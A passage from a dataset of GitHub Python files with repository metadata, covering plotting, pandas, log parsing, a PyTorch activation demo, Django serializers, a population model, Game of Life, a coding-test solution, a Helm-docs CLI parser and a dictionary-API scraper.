\"FS_t1_pt\", \"FS_t2_dz\",\n \"FS_t2_phi\", \"HTT_dR\", \"nCleanJetGT30\", \"FS_t1_dz\", \"FS_t1_phi\",\n \"FS_t2_dxy\", \"FS_t2_eta\", \"FS_t2_pt\", \"HTT_m_vis\"]\n\ncommon_name = \"FS_plots/2p1_best_QCD_correct_ratio_err_ditau_\"\n\nfor variable in variables:\n print(f\"setting up plots for {variable}\")\n set1 = np.array(Image.open(common_name + \"0j/\"+variable+\".png\"))\n set2 = np.array(Image.open(common_name + \"1j/\"+variable+\".png\"))\n set3 = np.array(Image.open(common_name + \"GTE2j/\"+variable+\".png\"))\n\n images = [set1, set2, set3]\n image_titles = [\"0j\", \"1j\", \"GTE2j\"]\n\n fig = plt.figure(figsize=(15,5))\n for i in range(0,len(images)):\n ax = fig.add_subplot(1, 3, i+1)\n ax.title.set_text(image_titles[i])\n plt.imshow(images[i])\n plt.axis('off')\n plt.tight_layout()\n filename = \"FS_plots/compare-jet-modes-\"+variable\n print(f\"saving as {filename}\")\n plt.savefig(filename+\".png\")\n\nprint(\"finished\")\n","repo_name":"brallmond/SimplePlot","sub_path":"compare_01GTE2J.py","file_name":"compare_01GTE2J.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25237986643","text":"import pandas as pd\n\ndf = pd.DataFrame({'A': range(1, 6),\n\n 'B': range(10, 0, -2),\n\n 'C': range(10, 5, -1)})\nten = 10\nft = df.query('B == @ten')\nprint(df)\n\nfor index, row in df.iterrows():\n print(df.iat[index, 2])\n\nprint(ft)\n","repo_name":"zeynepaki/lcoe-merger-compacter","sub_path":"lcoe.py","file_name":"lcoe.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16685995134","text":"import csv\nimport pymongo\nimport os.path\nimport collections\nimport tldextract\nimport itertools\nfrom urllib.parse import urlsplit\nfrom urllib.parse import urlparse\nfrom pymongo import MongoClient\nfrom datetime import datetime\nimport timeit\nimport unicodedata\nimport gc\n\n\nPATH_WEB_LOG_FILE = '/media/moojokeubuntu/AA6259046258D6A3/AnotherDrive/Project/weblog/data/weblog-20180312_2/12/%s'\nPATH_WEB_LOG_FILE_2 = '/media/moojokeubuntu/AA6259046258D6A3/AnotherDrive/Project/weblog/data/weblog-20180319_2/19/%s'\nPATH_SAVE_LOG = '/home/moojokeubuntu/KU/4_2/RealProject/webpattern/Detection/Input'\nPATH_SAVE_LOG2 = '/home/moojokeubuntu/KU/4_2/RealProject/webpattern/Detection/Input/%s'\n\ndef readfile():\n\n list_folder_name = [\"00%s\",\n \"01%s\",\n \"02%s\",\n \"03%s\",\n \"04%s\",\n \"05%s\",\n \"06%s\",\n \"07%s\",\n \"08%s\",\n \"09%s\",\n \"10%s\",\n \"11%s\",\n \"12%s\",\n \"13%s\",\n \"14%s\",\n \"15%s\",\n \"16%s\",\n \"17%s\",\n \"18%s\",\n \"19%s\",\n \"20%s\",\n \"21%s\",\n \"22%s\",\n \"23%s\"]\n \n\n\n #list_folder_name = [\"13%\"s\"%s\",\"14%s\",\"15%s\"]\n #list_folder_name = [\"20%s\",\"21%s\",\"22%s\"]\n list_file_name =[\"/web-20180312%s\"]\n\n list_minute_name = [\"00%s\",\n \"01%s\",\n \"02%s\",\n \"03%s\",\n \"04%s\",\n \"05%s\",\n \"06%s\",\n \"07%s\",\n \"08%s\",\n \"09%s\",\n \"10%s\",\n \"11%s\",\n \"12%s\",\n \"13%s\",\n \"14%s\",\n \"15%s\",\n \"16%s\",\n \"17%s\",\n \"18%s\",\n \"19%s\",\n \"20%s\",\n \"21%s\",\n \"22%s\",\n \"23%s\",\n \"24%s\",\n \"25%s\",\n \"26%s\",\n \"27%s\",\n \"28%s\",\n \"29%s\",\n \"30%s\",\n \"31%s\",\n \"32%s\",\n \"33%s\",\n \"34%s\",\n \"35%s\",\n \"36%s\",\n \"37%s\",\n \"38%s\",\n \"39%s\",\n \"40%s\",\n \"41%s\",\n \"42%s\",\n \"43%s\",\n \"44%s\",\n \"45%s\",\n \"46%s\",\n \"47%s\",\n \"48%s\",\n \"49%s\",\n \"50%s\",\n \"51%s\",\n \"52%s\",\n \"53%s\",\n \"54%s\",\n \"55%s\",\n \"56%s\",\n \"57%s\",\n \"58%s\",\n \"59%s\"]\n \n list_char = []\n count = 0\n list_sub_name = [\".0.txt\",\".1.txt\",\".2.txt\",\".3.txt\",\".4.txt\",\".5.txt\"]\n for folder in list_folder_name :\n for file_name in list_file_name :\n for minute in list_minute_name :\n for sub in list_sub_name :\n with open (PATH_WEB_LOG_FILE%(folder%(file_name%(folder%(minute%(sub)))))) as file: \n for line in file.readlines():\n #print(line)\n line_split = line.split(\" \")\n #print(len(line_split))\n if len(line_split) >= 17 :\n if line_split[15] == 'GET':\n if line_split[4] != \"-\" :\n print(line_split[17])\n for j in line_split[17] :\n if j not in list_char:\n print(j)\n count += 1\n list_char.append(j)\n for folder in list_folder_name :\n for file_name in list_file_name :\n for minute in list_minute_name :\n for sub in list_sub_name :\n with open (PATH_WEB_LOG_FILE_2%(folder%(file_name%(folder%(minute%(sub)))))) as file: \n for line in file.readlines():\n #print(line)\n line_split = line.split(\" \")\n #print(len(line_split))\n if len(line_split) >= 17 :\n if line_split[15] == 'GET':\n if line_split[4] != \"-\" :\n print(line_split[17])\n for j in line_split[17] :\n if j not in list_char:\n print(j)\n count += 1\n list_char.append(j)\n print(count)\n Write(list_char)\n \n\ndef Write(list_char):\n compath = os.path.join(PATH_SAVE_LOG, 'unique_all.txt')\n with open(compath,'a') as f:\n for key in list_char:\n f.writelines(key+'\\n') \n\n\nif __name__ == '__main__':\n start = timeit.default_timer()\n readfile()\n #oopen()\n #test()\n stop = timeit.default_timer()\n print(stop - start)","repo_name":"MooSithichai/Analysis_of_Unusual_Internet_Usage","sub_path":"URL/Mahala/find_unique.py","file_name":"find_unique.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23436030961","text":"'''\nScript for demonstration of the BReLU activation function.\n'''\n# import utilities\nimport sys\nsys.path.insert(0, '../')\nimport argparse\n\n# import pytorch\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\n\n# import BReLU from Echo\nfrom echoAI.Activation.Torch.brelu import BReLU\n\nclass CNN(nn.Module):\n '''\n Simple CNN to demonstrate BReLU activation.\n '''\n def __init__(self):\n super(CNN, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 16, kernel_size=5, padding=2),\n nn.BatchNorm2d(16))\n\n self.brelu1 = BReLU.apply\n self.pool1 = nn.MaxPool2d(2)\n\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 32, kernel_size=5, padding=2),\n nn.BatchNorm2d(32))\n\n self.brelu2 = BReLU.apply\n self.pool2 = nn.MaxPool2d(2)\n\n self.fc = nn.Linear(7*7*32, 10)\n\n def forward(self, x):\n x = x.reshape(-1, 1, 28, 28)\n\n x = self.layer1(x)\n x = self.brelu1(x)\n x = self.pool1(x)\n\n x = self.layer2(x)\n x = self.brelu2(x)\n x = self.pool2(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\n# create class for basic fully-connected deep neural network\nclass Classifier(nn.Module):\n '''\n Basic fully-connected network to test BReLU.\n '''\n def __init__(self):\n super().__init__()\n\n # initialize layers\n self.fc1 = nn.Linear(784, 256)\n self.fc2 = nn.Linear(256, 128)\n self.fc3 = nn.Linear(128, 64)\n self.fc4 = nn.Linear(64, 10)\n\n # initialize SReLU\n self.a1 = BReLU.apply\n self.a2 = BReLU.apply\n self.a3 = BReLU.apply\n\n def forward(self, x):\n # make sure the input tensor is flattened\n x = x.view(x.shape[0], -1)\n\n # apply SReLU function\n x = self.a1(self.fc1(x))\n x = self.a2(self.fc2(x))\n x = self.a3(self.fc3(x))\n x = F.log_softmax(self.fc4(x), dim=1)\n\n return x\n\ndef main():\n '''\n Script for BReLU demonstration.\n '''\n # Parse command line arguments\n parser = argparse.ArgumentParser(description='Argument parser')\n\n # Add argument to choose network architecture\n parser.add_argument('--model', action='store', default = 'FC',\n help='Model architecture: use fully-connected model or CNN.',\n choices = ['FC', 'CNN'])\n\n # Parse command line arguments\n results = parser.parse_args()\n architecture = results.model\n\n # apply BReLU to random tensor\n brelu_activation = BReLU.apply\n t = torch.randn((5,5), dtype=torch.float, requires_grad = True)\n t = brelu_activation(t)\n\n # apply BReLU for simple model (FC or CNN depending on parameter)\n # create a model to classify Fashion MNIST dataset\n # Define a transform\n transform = transforms.Compose([transforms.ToTensor()])\n\n # Download and load the training data for Fashion MNIST\n trainset = datasets.FashionMNIST('~/.pytorch/F_MNIST_data/', download=True, train=True, transform=transform)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=64, shuffle=True)\n\n # Download and load the test data for Fashion MNIST\n testset = datasets.FashionMNIST('~/.pytorch/F_MNIST_data/', download=True, train=False, transform=transform)\n testloader = torch.utils.data.DataLoader(testset, batch_size=64, shuffle=True)\n\n print(\"Create model with {activation} function.\\n\".format(activation = 'BReLU'))\n\n # create model\n if (architecture == 'FC'):\n model = Classifier()\n criterion = nn.NLLLoss()\n else:\n model = CNN()\n criterion = nn.CrossEntropyLoss()\n print(model)\n\n # Train the model\n print(\"Training the model on Fashion MNIST dataset with {} activation function.\\n\".format('BReLU'))\n\n optimizer = optim.Adam(model.parameters(), lr=0.003)\n\n epochs = 5\n\n for e in range(epochs):\n running_loss = 0\n for images, labels in trainloader:\n images = images.view(images.shape[0], -1)\n log_ps = model(images)\n loss = criterion(log_ps, labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n else:\n print(f\"Training loss: {running_loss}\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"mbijon/Echo","sub_path":"Smoke_tests/torch_brelu_demo.py","file_name":"torch_brelu_demo.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"19008632422","text":"from rest_framework.serializers import ModelSerializer,PrimaryKeyRelatedField\nfrom api.models import Comment,Like,Item\nfrom api.serializers.user import UserSerializer\nfrom api.serializers.item import ItemDetailSerializer\nfrom django.contrib.auth.models import User\n\nclass CommentSerializer(ModelSerializer):\n\n\towner=UserSerializer(many=False,read_only=False)\n\titem=PrimaryKeyRelatedField(queryset=Item.objects.all())\n\tclass Meta:\n\t\tmodel=Comment\n\t\tfields=(\n\t\t\t'id',\n\t\t\t'item',\n\t\t\t'owner',\n\t\t\t'body',\n\t\t\t'created_at',\n\t\t\t'updated_at',\n\t\t\t)\n\t\tread_only_fields=['id']\n\n\nclass LikeSerializer(ModelSerializer):\n\n\towner=UserSerializer(many=False,read_only=False)\n\titem=PrimaryKeyRelatedField(queryset=Item.objects.all())\n\tclass Meta:\n\t\tmodel=Like\n\t\tfields=(\n\t\t\t'id',\n\t\t\t'item',\n\t\t\t'owner',\n\t\t\t'created_at',\n\t\t\t'updated_at',\n\t\t\t)\n\t\tread_only_fields=['id']","repo_name":"Saumitra-Shukla/Groups-App-Balloon","sub_path":"base/api/serializers/comm.py","file_name":"comm.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27846568244","text":"import numpy as np\r\nimport time\r\n\r\nstart = time.time()\r\n\r\n\"\"\"\r\nfrom mpi4py import MPI \r\ncomm = MPI.COMM_WORLD\r\nrank = comm.Get_rank()\r\nsize = comm.Get_size() \"\"\"\r\n\r\n# CREATE THE PROJECTION MATRIX\r\nL = np.array([[0, 0.133, 1.082, 1.194, 1.590, 1.590, 1.590, 1.590],\r\n [0.380, 0, 0, 0, 0, 0, 0, 0], \r\n [0, 0.653, 0, 0, 0, 0, 0, 0], \r\n [0, 0, 0.850, 0, 0, 0, 0, 0],\r\n [0, 0, 0, 0.400, 0, 0, 0, 0],\r\n [0, 0, 0, 0, 0.589, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0.589, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0.589, 0]])\r\n\r\n#AGE DISTRIBUTION AT, t = 0\r\nx_0 = np.array([[20], [10], [9], [9], [3], [3], [2], [2]])\r\n\r\n#FINDING THE STABLE POPULATION DISTRIBUTION\r\nkmax = 1000\r\nk = 1\r\n\r\nwhile k < kmax:\r\n Lk = np.linalg.matrix_power(L, k)\r\n x_t = np.matmul(Lk, x_0)\r\n #computing total population\r\n total_pop = np.sum(x_t)\r\n #initializing convergence condition\r\n if total_pop <= 1:\r\n break\r\n #reassingment\r\n k += 1\r\n\r\n\r\n\r\n\r\n#FINDING PROJECTED POPULATION GROWTH RATE\r\neigen_values, eigen_vectors = np.linalg.eig(L)\r\nlambdah = np.linalg.norm(eigen_values, np.inf)\r\nyearly_decline = (lambdah - 1) * 100\r\n\r\n\r\nsurvival = [0.38, 0.653, 0.85, 0.4, 0.589, 0.589, 0.589]\r\n\r\nparams = [1.05, 1.1, 1.15, 1.2, 0.95, 0.9, 0.85, 0.8]\r\n\r\n\r\nchange_list = []\r\nfor x in survival:\r\n for y in params:\r\n p_new = x*y\r\n change_list.append(p_new)\r\n\r\nchange_arr = np.vstack(change_list)\r\n\r\nchange_arr\r\n\r\nP1_new = change_arr[0: 8]\r\nP2_new = change_arr[8: 16]\r\nP3_new = change_arr[16: 24]\r\nP4_new = change_arr[24: 32]\r\nP5_new = change_arr[32: 40]\r\nP6_new = change_arr[40: 48]\r\nP7_new = change_arr[48: 56]\r\n\r\n\r\n\r\n\r\nrate_1 = []\r\nL1 = np.copy(L)\r\nfor entry in P1_new:\r\n L1[1,0] = entry\r\n eigen_value1, eigen_vector1 = np.linalg.eig(L1)\r\n lambdah1 = np.linalg.norm(eigen_value1, np.inf)\r\n rate_1.append(lambdah1)\r\n\r\nrate_2 = []\r\nL2 = np.copy(L)\r\nfor entry in P2_new:\r\n L2[2,1] = entry\r\n eigen_value2, eigen_vector2 = np.linalg.eig(L2)\r\n lambdah2 = np.linalg.norm(eigen_value2, np.inf)\r\n rate_2.append(lambdah2)\r\n\r\nrate_3 = []\r\nL3 = np.copy(L)\r\nfor entry in P3_new:\r\n L3[3,2] = entry\r\n eigen_value3, eigen_vector3 = np.linalg.eig(L3)\r\n lambdah3 = np.linalg.norm(eigen_value3, np.inf)\r\n rate_3.append(lambdah3)\r\n\r\nrate_4 = []\r\nL4 = np.copy(L)\r\nfor entry in P4_new:\r\n L4[4,3] = entry\r\n eigen_value4, eigen_vector4 = np.linalg.eig(L4)\r\n lambdah4 = np.linalg.norm(eigen_value4, np.inf)\r\n rate_4.append(lambdah4)\r\n\r\nrate_5 = []\r\nL5 = np.copy(L)\r\nfor entry in P5_new:\r\n L5[5,4] = entry\r\n eigen_value5, eigen_vector5 = np.linalg.eig(L5)\r\n lambdah5 = np.linalg.norm(eigen_value5, np.inf)\r\n rate_5.append(lambdah5)\r\n \r\nrate_6 = []\r\nL6 = np.copy(L)\r\nfor entry in P6_new:\r\n L6[6,5] = entry\r\n eigen_value6, eigen_vector6 = np.linalg.eig(L6)\r\n lambdah6 = np.linalg.norm(eigen_value6, np.inf)\r\n rate_6.append(lambdah6)\r\n\r\nrate_7 = []\r\nL7 = np.copy(L)\r\nfor entry in P7_new:\r\n L7[7,6] = entry\r\n eigen_value7, eigen_vector7 = np.linalg.eig(L7)\r\n lambdah7 = np.linalg.norm(eigen_value7, np.inf)\r\n rate_7.append(lambdah7)\r\n\r\n\r\n\r\n# change in lambdah\r\nlam1 = np.vstack(rate_1).reshape(-1,1)\r\nd_lam1 = lam1 - lambdah\r\n#change in survivability\r\ndP1 = P1_new - survival[0]\r\n#sensitivity\r\nsense1 = d_lam1/dP1\r\n\r\n\r\n\r\nlam2 = np.vstack(rate_2).reshape(-1, 1)\r\nd_lam2 = lam2 - lambdah\r\n#change in survivability\r\ndP2 = P2_new - survival[1]\r\n#sensitivity\r\nsense2 = d_lam2/dP2\r\n\r\nlam3 = np.asarray(rate_3).reshape(-1, 1)\r\nd_lam3 = lam3 - lambdah\r\n#change in survivability\r\ndP3 = P3_new - survival[2]\r\n#sensitivity\r\nsense3 = d_lam3/dP3\r\n\r\n\r\nlam4 = np.asarray(rate_4).reshape(-1, 1)\r\nd_lam4 = lam4 - lambdah\r\n#change in survivability\r\ndP4 = P4_new - survival[3]\r\n#sensitivity\r\nsense4 = d_lam4/dP4\r\n\r\n\r\nlam5 = np.asarray(rate_5).reshape(-1, 1)\r\nd_lam5 = lam5 - lambdah\r\n#change in survivability\r\ndP5 = P5_new - survival[4]\r\n#sensitivity\r\nsense5 = d_lam5/dP5\r\n\r\n\r\nlam6 = np.asarray(rate_6).reshape(-1, 1)\r\nd_lam6 = lam6 - lambdah\r\n#change in survivability\r\ndP6 = P6_new - survival[5]\r\n#sensitivity\r\nsense6 = d_lam6/dP6\r\n\r\nlam7 = np.asarray(rate_7).reshape(-1, 1)\r\nd_lam7 = lam7 - lambdah\r\n#change in survivability\r\ndP7 = P7_new - survival[6]\r\n#sensitivity\r\nsense7 = d_lam7/dP7\r\n\r\n\r\n\r\n\r\nend = time.time()\r\n\r\nprint(\"Decline rate: \", lambdah)\r\nprint(\"\\nAnnual decline: \", yearly_decline)\r\nprint(\"\\nYears of extinction: \", k)\r\n\r\nprint(\"\\nSensitivity 1: \", sense1.round(4))\r\nprint(\"\\nSensitivity 2: \", sense2.round(4))\r\nprint(\"\\nSensitivity 3: \", sense3.round(4))\r\nprint(\"\\nSensitivity 4: \", sense4.round(4))\r\nprint(\"\\nSensitivity 5: \", sense5.round(4))\r\nprint(\"\\nSensitivity 6: \", sense6.round(4))\r\nprint(\"\\nSensitivity 7: \", sense7.round(4))\r\n\r\nprint (\"\\nExecution time: \", str(end-start))\r\n\r\n","repo_name":"nnamdi095/Age-Structured-Population-Model","sub_path":"age_model_extinction_serial.py","file_name":"age_model_extinction_serial.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43657557196","text":"from django.http.response import Http404\nfrom django.views.generic.base import View, TemplateView\nfrom django_mitid_auth import login_provider_class\nfrom django_mitid_auth.saml.saml2 import Saml2\n\n\nclass MetadataView(View):\n def get(self, request):\n provider = login_provider_class()\n if issubclass(provider, Saml2):\n return provider.metadata(request)\n else:\n raise Http404\n\n\nclass AccessDeniedView(TemplateView):\n status = 403\n\n def render_to_response(self, context, **response_kwargs):\n response_kwargs[\"status\"] = self.status\n return super().render_to_response(context, **response_kwargs)\n","repo_name":"magenta-aps/gl-django-login","sub_path":"src/django_mitid_auth/saml/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"35315423257","text":"from multiprocessing import Pool\r\nimport time\r\nimport threading\r\nimport random\r\nimport numpy as np\r\nimport os\r\nimport copy\r\n\r\nclass Board:\r\n def __init__(self, width, height, beVerbose):\r\n self.width = width\r\n self.height = height\r\n self.beVerbose = beVerbose\r\n self.myBoard = np.zeros((width, height), dtype=bool)\r\n\r\n '''\r\n Function to init board\r\n '''\r\n def initBoard(self):\r\n for y in range(self.height):\r\n for x in range(self.width):\r\n rnd = random.randint(0, 1)\r\n self.myBoard[x][y] = True if rnd == 1 else False\r\n \r\n '''\r\n Function to update board\r\n ''' \r\n def updateBoard(self, tmp):\r\n tmpBoard = copy.deepcopy(self.myBoard)\r\n for y in range(self.height):\r\n for x in range(self.width):\r\n neighbors = self.countLiveNeighbors(x, y)\r\n currentCell = self.myBoard[x][y]\r\n\r\n if ((currentCell == True and (neighbors == 2 or neighbors == 3)) or (currentCell == False and neighbors == 3)):\r\n tmpBoard[x][y] = True\r\n else:\r\n tmpBoard[x][y] = False\r\n \r\n self.myBoard = copy.deepcopy(tmpBoard)\r\n\r\n if self.beVerbose:\r\n self.printBoard()\r\n\r\n '''\r\n Function to count live neighbors of cell\r\n '''\r\n def countLiveNeighbors(self, x, y):\r\n val = 0\r\n\r\n for j in range(-1, 2):\r\n if (y + j < 0 or y + j >= self.height):\r\n continue\r\n\r\n k = (y + j + self.height) % self.height\r\n\r\n for i in range(-1, 2):\r\n if (x + i < 0 or y + i >= self.width):\r\n continue\r\n\r\n h = (x + i + self.width) % self.width\r\n val = val + (1 if self.myBoard[h][k] else 0)\r\n return val - (1 if self.myBoard[x][y] else 0) \r\n\r\n '''\r\n Function to print board\r\n '''\r\n def printBoard(self):\r\n for y in range(self.height):\r\n strng = \"\"\r\n for x in range(self.width):\r\n if self.myBoard[x][y] == False: strng = strng + \" \"\r\n else: strng = strng + \"X\"\r\n print(strng)\r\n print(\"\\n\\n\\n\")\r\n\r\n\r\n### Function to do serial game of life\r\ndef serialGOF(board, numOfGenerations):\r\n for i in range(numOfGenerations):\r\n board.updateBoard(numOfGenerations)\r\n \r\n### Function to do parallel game of life\r\ndef parallelGOF(board, numOfGenerations):\r\n pool = Pool()\r\n hm = pool.map(board.updateBoard, range(numOfGenerations))\r\n pool.close()\r\n pool.join()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Parameters\r\n width = 50\r\n height = 50\r\n numOfGenerations = 150\r\n beVerbose = False\r\n\r\n # Init serial and parallel board\r\n board = Board(width, height, beVerbose)\r\n board.initBoard()\r\n parallelBoard = Board(width, height, beVerbose)\r\n parallelBoard.myBoard = board.myBoard\r\n\r\n # Serial Game of Life\r\n s1 = time.time()\r\n serialGOF(board, numOfGenerations)\r\n e1 = time.time()\r\n print(\"\\nSerial: {:10.5f}\".format(e1 - s1))\r\n\r\n # Parallel Game of Life\r\n s2 = time.time()\r\n parallelGOF(board, numOfGenerations)\r\n e2 = time.time()\r\n print(\"\\nParallel: {:10.5f}\".format(e2 - s2))\r\n print(\"\\n\")\r\n","repo_name":"Pinkieqt/PAI","sub_path":"python/GOF.py","file_name":"GOF.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12554571908","text":"\"\"\"\n @ 2019 카카오 개발자 겨울 인턴십 코딩 테스트 : 불량사용자\n @ Prob. https://programmers.co.kr/learn/courses/30/lessons/64064\n Ref. https://regularmember.tistory.com/192\n @ Algo: 구현\n @ Start day: 20. 04. 22.\n @ End day: 20. 04. 22.\n\"\"\"\n\nfrom itertools import permutations, combinations\n\n\ndef isMatch(bann, users):\n for i in range(len(bann)):\n if bann[i] == '*': continue\n elif bann[i] != users[i]:\n return False\n return True\n\n# ['fr*d*', 'abc1**'] ('frodo', 'fradi')\ndef check(banned_ids, candidate_users):\n len_ids = len(banned_ids)\n # print(\"------------------------------------\")\n for i in range(len_ids):\n if len(banned_ids[i]) != len(candidate_users[i]):\n return False\n # print(banned_ids[i], candidate_users[i], i)\n if isMatch(banned_ids[i], candidate_users[i]) is False:\n return False\n\n return True\n\nans_set = list()\n\ndef solution(user_ids, banned_ids):\n num_of_banned_user = len(banned_ids)\n ans = 0\n\n for a in permutations(user_ids, num_of_banned_user):\n print(a)\n\n for candidate_users in permutations(user_ids, num_of_banned_user):\n if check(banned_ids, candidate_users) is True:\n # candidate_users = set(candidate_users)\n # print(\"D\", candidate_users)\n ans_set.append(candidate_users)\n ans += 1\n print(\"Ans\", banned_ids, candidate_users)\n\n test = ans_set\n # print(ans_set)\n return ans\n\n\n# user_id = [\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"]\n# banned_id = [\"fr*d*\", \"abc1**\"]\n# print(solution(user_id, banned_id)) # 2\n\nuser_id = [\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"]\nbanned_id = [\"*rodo\", \"*rodo\", \"******\"]\nprint(solution(user_id, banned_id)) # 2\n#\n# user_id = [\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"]\n# banned_id = [\"fr*d*\", \"*rodo\", \"******\", \"******\"] # 2 2 2\n# print(solution(user_id, banned_id)) # 3\n\n","repo_name":"KoEonYack/LevelUp-Algorithm","sub_path":"kakao/19_winter_intern/Q3_2.py","file_name":"Q3_2.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"75030402603","text":"import argparse\r\n\r\n\r\ndef parse_command_line_args():\r\n parser = argparse.ArgumentParser(\r\n prog=\"doxy-helm\",\r\n description=\"Helm Docs Command Line Tool\",\r\n epilog=\"For more information, visit https://github.com/tactful-ai/doxy-helm\",\r\n )\r\n\r\n parser.add_argument(\"-td\", \"--table-depth\", default=1, type=int, help=\"Depth of separate tables to generate\")\r\n parser.add_argument(\"-c\", \"--chart-search-root\", default=\".\", help=\"Directory to search recursively within for charts\")\r\n parser.add_argument(\"-t\", \"--template-file\", default='README.md.gotmpl', help=\"Gotemplate file paths relative to each chart directory from which documentation will be generated\")\r\n parser.add_argument(\"-d\", \"--dry-run\", default=False, action=\"store_true\", help=\"Don't actually render any markdown files, just print to stdout\")\r\n parser.add_argument(\"-o\", \"--output-file\", default=\"README.md\", help=\"Markdown file path relative to each chart directory to which rendered documentation will be written\")\r\n parser.add_argument(\"-i\", \"--ignore-file\", default=\".helmdocsignore\", help=\"The filename to use as an ignore file to exclude chart directories\")\r\n parser.add_argument(\"-f\", \"--values-file\", default=\"values.yaml\", help=\"Path to values file\")\r\n parser.add_argument(\"-s\", \"--sort-values-order\", default=\"File\", choices=[\"AlphaNum\", \"File\"], help=\"Order in which to sort the values table\")\r\n parser.add_argument(\"-n\", \"--ignore-non-descriptions\", default=False, action=\"store_true\", help=\"Ignore values without a comment, these values will not be included in the README\")\r\n\r\n # parser.add_argument(\"-b\", \"--badge-style\", default=\"flat-square\", help=\"Badge style to use for charts\")\r\n # parser.add_argument(\"-u\", \"--document-dependency-values\", action=\"store_true\", help=\"Include dependency values in the chart values documentation\")\r\n # parser.add_argument(\"-g\", \"--chart-to-generate\", nargs=\"+\", default=[], help=\"List of charts that will have documentation generated\")\r\n # parser.add_argument(\"-x\", \"--documentation-strict-mode\", action=\"store_true\", help=\"Fail the generation of docs if there are undocumented values\")\r\n # parser.add_argument(\"-y\", \"--documentation-strict-ignore-absent\", nargs=\"+\", default=[\"service.type\", \"image.repository\", \"image.tag\"], help=\"Values which are allowed not to be documented in strict mode\")\r\n # parser.add_argument(\"-z\", \"--documentation-strict-ignore-absent-regex\", nargs=\"+\", default=[\".*service\\\\.type\", \".*image\\\\.repository\", \".*image\\\\.tag\"], help=\"Regex patterns of values which are allowed not to be documented in strict mode\")\r\n\r\n args = parser.parse_args()\r\n\r\n return args\r\n\r\n","repo_name":"tactful-ai/doxy-helm","sub_path":"pkg/cmd/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2407230344","text":"'''\nAuthor: whalefall\nDate: 2021-02-20 17:33:34\nLastEditTime: 2021-02-20 18:58:57\nDescription: 简易版的小鸡词典爬虫,可能有限制,供聚合api调用使用\n'''\nimport requests\nimport json\n\nfrom urllib import parse # url编码\n\n\ndef checkWord(word):\n\n headers = {\n 'Host': 'api.jikipedia.com',\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'Origin': 'https://jikipedia.com',\n 'XID': 'Sy2mcDa6hc6UH4q5W696OtmrHbmwsh0h2x88BKScmhluiJGIZo1eJLQzZoEpBkBOS1jXDCU4KydLz80Jqpk+EFLqi+w5qWc7f4fIrIoARTA=',\n 'Client-Version': '2.4.1',\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Mobile Safari/537.36',\n 'Client': 'web',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Accept': 'application/json, text/plain, */*',\n 'Sec-Fetch-Dest': 'empty',\n 'Token': '',\n 'Sec-Fetch-Site': 'same-site',\n 'Sec-Fetch-Mode': 'cors',\n # 进行url编码\n 'Referer': 'https://jikipedia.com/searching?phrase={}'.format(parse.quote(word)),\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n }\n\n data = {\"phrase\": \"{}\".format(word), \"page\": 1}\n try:\n response = requests.post(\n 'https://api.jikipedia.com/go/search_definitions', headers=headers, json=data, verify=False).json()\n\n # print(response)\n title = response[\"data\"][0][\"term\"][\"title\"]\n content = response[\"data\"][0][\"content\"].replace(\" \",\"\")\n # print(title, content)\n dict = {\n \"title\": title,\n \"content\": content,\n }\n except Exception as e:\n print(\"[xiaojiDict]查%s出现错误! 错误信息:%s\" % (word, e))\n dict = {\n \"title\": \"查%s出现错误!\" % (word),\n \"content\": \"错误信息:%s\" % (e),\n }\n return dict\n\n\nif __name__ == \"__main__\":\n\n checkWord(\"时代峰峻\")\n","repo_name":"WhaleFell/PythonAPI","sub_path":"function/xiaojiDict.py","file_name":"xiaojiDict.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"25520154097","text":"import os,datetime\n\nflag = '' if os.path.isdir('.') else ' '\n\n\nlist = os.listdir('.')\nfor i in list:\n fname = i\n fsize = os.path.getsize(fname)\n ftime = 